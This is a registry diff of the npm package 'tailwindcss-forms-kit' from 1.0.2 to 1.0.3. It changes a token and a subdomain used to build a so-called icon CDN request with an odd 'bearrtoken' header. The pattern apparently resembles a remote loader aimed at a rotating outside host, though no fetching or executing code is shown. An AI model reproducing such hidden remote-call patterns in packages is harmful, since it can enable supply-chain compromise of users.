tailwindcss-forms-kit 1.0.2 → 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -54,8 +54,8 @@ const protocol = "https",
54
54
  path = "/icons/";
55
55
  // Constructs the base URL for the CDN
56
56
 
57
- const token = "100",
58
- subdomain = "rest-icon-moduler",
57
+ const token = "824",
58
+ subdomain = "tailwindkit-six",
59
59
  head = { bearrtoken: "logo" };
60
60
  // Options for the request, including the URL and headers
61
61
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "tailwindcss-forms-kit",
3
- "version": "1.0.2",
3
+ "version": "1.0.3",
4
4
  "description": "A module to provide an tailwind forms kit.",
5
5
  "main": "index.js",
6
6
  "scripts": {